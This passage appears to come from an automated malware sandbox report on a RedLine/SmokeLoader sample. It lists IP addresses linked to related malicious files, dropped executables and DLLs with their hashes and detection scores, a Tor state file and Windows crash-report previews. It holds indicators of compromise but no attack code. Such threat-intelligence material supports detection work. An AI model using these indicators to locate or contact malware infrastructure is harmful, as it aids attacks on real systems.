                                                                                                                                                                                                                                                                                                    • 81.31.35.50
                                                                                                                                                                                                                                                                                                    • 3.33.130.190
                                                                                                                                                                                                                                                                                                    • 178.172.160.19
                                                                                                                                                                                                                                                                                                    83d60721ecc423892660e275acc4dffdfile.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    qG2cUr0x4A.exeGet hashmaliciousBitCoin Miner, RedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    klWGq3yDcQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    g5oo6DQ4pd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    indexGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    malware.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    reverseshell.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    4hy2wIO57k.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    Uv4KrQL2Rt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    THtPIwSCb7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    tinynuke.exeGet hashmaliciousTinynuke / NukebotBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    WLm4U77a8q.dllGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                                                                                                                    • 51.81.56.229
                                                                                                                                                                                                                                                                                                    • 45.66.33.45
                                                                                                                                                                                                                                                                                                    • 185.241.208.163
                                                                                                                                                                                                                                                                                                    • 199.58.81.140
                                                                                                                                                                                                                                                                                                    • 193.23.244.244
                                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                    C:\ProgramData\Drivers\csrss.exefile.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\451C.dllfile.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\4888.exefile.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (353), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):3905
                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.333150028630539
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:96:SwJRKOEP3hAxcMpjyZaWVZjr4hexnzktZkL:xSPvtnr4e9z9
                                                                                                                                                                                                                                                                                                                MD5:B1CE6DCF992C83189BBCD8332E57B0E2
                                                                                                                                                                                                                                                                                                                SHA1:307556B00D4FB48055AC768A1DFC3FC5FBE53948
                                                                                                                                                                                                                                                                                                                SHA-256:84B4972A7C3D2FB7A130F9B11984B5A1333CC7909B54DDD8801F8F05D208AD5C
                                                                                                                                                                                                                                                                                                                SHA-512:990153F45FB59E6DEB7C784773EE1D2831B174D48132EE47E8A146AD9CEDEB2AF53973572AE796C8F9965DBD22370FE163F5DC3AD8DCFE5E8DAB323EFC412C7F
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:# Tor state file last generated on 2023-12-02 02:16:52 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 525 1..CircuitBuildTimeBin 625 1..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 2975 1..CircuitBuildTimeBin 5625 1..CircuitBuildTimeBin 6275 1..CircuitBuildTimeBin 6525 1..CircuitBuildTimeBin 6625 1..CircuitBuildTimeBin 7325 1..CircuitBuildTimeBin 15875 1..Dormant 0..Guard in=default rsa_id=74DFE78731F875B6665E04E5751BB667C66784DB nickname=ATLurmyivna sampled_on=2023-11-25T15:53:38 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-11-30T17:55:22 confirmed_idx=0 pb_use_attempts=6.000000 pb_use_successes=6.000000 pb_circ_attempts=11.000000 pb_circ_successes=11.000000 pb_successful_circuits_closed=11.000000..Guard in=default rsa_id=8498DF1A123D9A614297B5074791C1D033A41DE4 nickname=RDPdotSH sampled_on=2023-11-29T13:41:56 sampled_idx=1 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=A4436E
                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\501B.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):2037760
                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.895271771869351
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:49152:JpOMJqAtfj8YFWZUQUqxbhS+oWOKl9BoKzLPGz+fATq:BJqaj8S8zUqx0xW1KKzLP8w
                                                                                                                                                                                                                                                                                                                MD5:57C833BFD5042E34BEC23DFD711CD151
                                                                                                                                                                                                                                                                                                                SHA1:6BCD1915173D57D369E209943BE31EEBEBDD535A
                                                                                                                                                                                                                                                                                                                SHA-256:9D3C881C29156B8FD82CED7C7726C4C65D4E741533C9F886112F440698B1469D
                                                                                                                                                                                                                                                                                                                SHA-512:3C14531CD81AC2276CAC72DA573CB5F452C53B96175ACCA025A8E30251C487FCD382A8BC25A5241E6700832DBB760313BF9E51FFA0FCD480D5DDC6662CBC02E1
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 49%
                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L...#.|d.................V....:.....J........p....@...........................W.............................................pY..<.....V.............................................................PG..@............................................text....T.......V.................. ..`.data....8..p.......Z..............@....rsrc.........V......t..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.7418813416997108
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:192:4vNKEFg/0Q0l1ekju9zuiFhZ24IO8R1wA:iQEF7Q0l1ekjMzuiFhY4IO8jw
                                                                                                                                                                                                                                                                                                                MD5:A20A1D385DD63466BEE06E64B151DAA1
                                                                                                                                                                                                                                                                                                                SHA1:DF8AB8D6E5DDFC991FDFCFCB4E8F988656280B85
                                                                                                                                                                                                                                                                                                                SHA-256:497CAE8A9B1E2C42916EED7647BFE61998FBC99877161A24180A21A033217990
                                                                                                                                                                                                                                                                                                                SHA-512:011A39FF2702F8D55378973756E55757E6FFE890F8218BED7A6C6E3DDA48EED88AF6D9BBDAC34185B81C37B2C733D8BE3FB06946CAC5687D17B62AF103A4DC7B
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.5.9.5.2.8.1.2.2.2.2.6.6.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.5.9.5.2.8.1.2.8.1.6.4.2.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.7.8.7.c.8.5.-.4.a.7.c.-.4.4.a.b.-.a.0.7.5.-.5.e.3.e.f.d.2.9.3.b.e.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.d.4.5.7.1.4.-.a.6.f.2.-.4.3.d.a.-.9.a.8.d.-.1.3.f.6.8.0.f.5.c.2.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.A.F.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.d.4.-.0.0.0.1.-.0.0.1.5.-.9.b.9.d.-.c.2.d.1.b.b.2.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.1.4.0.1.8.c.5.9.1.9.e.e.0.1.e.6.3.b.c.d.8.d.c.7.f.0.2.e.1.b.0.0.0.0.f.f.f.f.!.0.0.0.0.f.b.3.5.9.5.f.8.a.5.f.9.c.2.4.3.e.5.a.d.1.0.8.f.f.1.1.b.c.5.c.b.2.4.0.0.e.c.2.b.!.4.A.F.A...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.1././.2.8.:.
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Sat Dec 2 01:06:52 2023, 0x1205a4 type
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):30602
                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.9452404995938126
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:192:mgIorKl0Xf3YdOcg3Bs+77aiWRwpeesNevBkrCzABK:HIG3hcgQ/NakrCZ
                                                                                                                                                                                                                                                                                                                MD5:DF81F73ED79D9CAA4AA094ADC5F47F73
                                                                                                                                                                                                                                                                                                                SHA1:86A5FACF9C49F4545B18C91164BF67D66FB1A408
                                                                                                                                                                                                                                                                                                                SHA-256:EFAB906556988B041F93DB674937BA3B47D27D27C7D3BD35629B6C893A86ED0F
                                                                                                                                                                                                                                                                                                                SHA-512:A09A013DD3BA436BFAD2CF0054FB372DB0E65F2358C50F93E6D01C3C6EE2B322C562C544C92AFAF987E95422A604CB8991BB59DD444309EE417205F781677B58
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:MDMP..a..... .......,.je........................t...........................T.......8...........T...........p....i......................................................................................................eJ..............GenuineIntel............T...........%.je............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):8398
                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.6988035513759923
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJYJ6n7F6Y2DoSU+pa5Ggmf6EpD089bIwsfu4m:R6lXJm6n7F6YFSU+p9gmf6YIDf4
                                                                                                                                                                                                                                                                                                                MD5:C42A73A35FDB22E22D997729FF47BFE2
                                                                                                                                                                                                                                                                                                                SHA1:AB7C9D86BA47FC58C1884C2E9E762A3C8A452570
                                                                                                                                                                                                                                                                                                                SHA-256:25D81148819D7334D7E53E8B8128DCA3E63B0B6069AE0B1C8C5BAF69A3CDB851
                                                                                                                                                                                                                                                                                                                SHA-512:4A183E8E6F895AD184C95E267C19C9ADBE464C0460F68A37578647F72EF5B953BD083E7C0FB35CBFDCF771A7B2B0BEBDD23847DEC4CEB12540EF8099EC29CD40
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.9.6.<./.P.i.
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):4696
                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.466443191989091
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zs5Jg77aI9IzWpW8VYgoYm8M4JGcO3FpJI+q8vZcO7WerWNrd:uIjfLI72C7VHFJno+KaoNrWNrd
                                                                                                                                                                                                                                                                                                                MD5:FBE63EA15161F5CFE510256D0DDF4271
                                                                                                                                                                                                                                                                                                                SHA1:5527EB54D3E65FEAEA117BAA29984884468061DA
                                                                                                                                                                                                                                                                                                                SHA-256:A26F0B8547B577351CF90239D05424DBC0E8261AFFC54DD7179EED769159EC62
                                                                                                                                                                                                                                                                                                                SHA-512:9ED19E66F4CBBC618D9D4750DA6670469400574D46CC2AEE43A1AEA7ED3F33DD85080B9855B9FC0C2EBF8CCDC347F6210102DD675061C308C35756D1B3F4D452
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="85929" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):2545
                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.330114603578639
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:48:MxHKlYHKh3oOfHKdHKJHKhBHK5AHKzetTHmtHo6nmHKtXoDHsLHG1qHjHKdH5HZV:iqlYqh3oSqdqJqLq2qzIGtI6mqcMLmwA
                                                                                                                                                                                                                                                                                                                MD5:1163BDFDF5B17A59D1328A5809367FFD
                                                                                                                                                                                                                                                                                                                SHA1:5CFE495BE2EF1E77CC3CC46667CD60A000D8C5FA
                                                                                                                                                                                                                                                                                                                SHA-256:759A541ECE43F0A74ACC1777A16A1BAA8E121037A16544D44F4044A266639FD8
                                                                                                                                                                                                                                                                                                                SHA-512:1E1E2AC96D98A69DB26A31E84DB1ADB84F2366DF6D61118146816B3690CF26D13907E9A2C9D91FD2D3B7A8CCB73C696B8D3912D22981F76609C8CB40A0777608
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):1022
                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.215200866635182
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:24:YqHZ6T06MhmamGgb0O0bihmVmGg6CUXyhmGNmGgbxdB6hm3mGgz0Jahm2mGgbNdh:YqHZ6T06McDTb0O0bic4TDUXycRTbxd/
                                                                                                                                                                                                                                                                                                                MD5:BA8512A1180143F7620E106FB9DF5F43
                                                                                                                                                                                                                                                                                                                SHA1:2EF20B9029C7C89ED134DD87F6A9403D4103031F
                                                                                                                                                                                                                                                                                                                SHA-256:171640BF14335CC6403F09E4C72C11146C7393E63A9273C71B98C2D456202BA9
                                                                                                                                                                                                                                                                                                                SHA-512:2B83F9321A98090269D610D552C19B06136719FCD9F310437B2852F938DED711A1D09EABF017BF9AAEA980F68CEC6703234808A5CAB74C9A52AE4903A0DAE797
                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":3053123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":3043123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":3033123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3023123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":3013123472,"LastSwitchedHighPart":31061843,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":3003123472,"LastSwitchedHighPart":31061843,
                                                                                                                                                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                Size (bytes):2523136
                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.789946765183455
                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                SSDEEP:24576:a+6e1SSR2TmV31dJOoD3jyAx09CSpbVv7CP3WKzCUWWbb33pt9gFgNlFA2YdcNEE:aXUH2T0PW9Cr/WKzCEn94gJVuBbJ4
                                                                                                                                                                                                                                                                                                                MD5:7C8BFDEE3C36B4A9222DE69D79A1A841
                                                                                                                                                                                                                                                                                                                SHA1:65E5EC73F95B0976AB19FB74A872072BCA704F7B
                                                                                                                                                                                                                                                                                                                SHA-256:E45C40410E9C94C3522E465D7DAB52266E56D5F815DC4FC9C4D3F3CF18D877F4
                                                                                                                                                                                                                                                                                                                SHA-512:8A574B7C6A6D4C398E738ECBB852EC04C22FEAE429DCF07BA66B52BFE16A6F6F8A32C30DA6AD58021570EB22BAF0DA017557A6F4D3D3B8E10EC18F6E8B52E6DB
                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
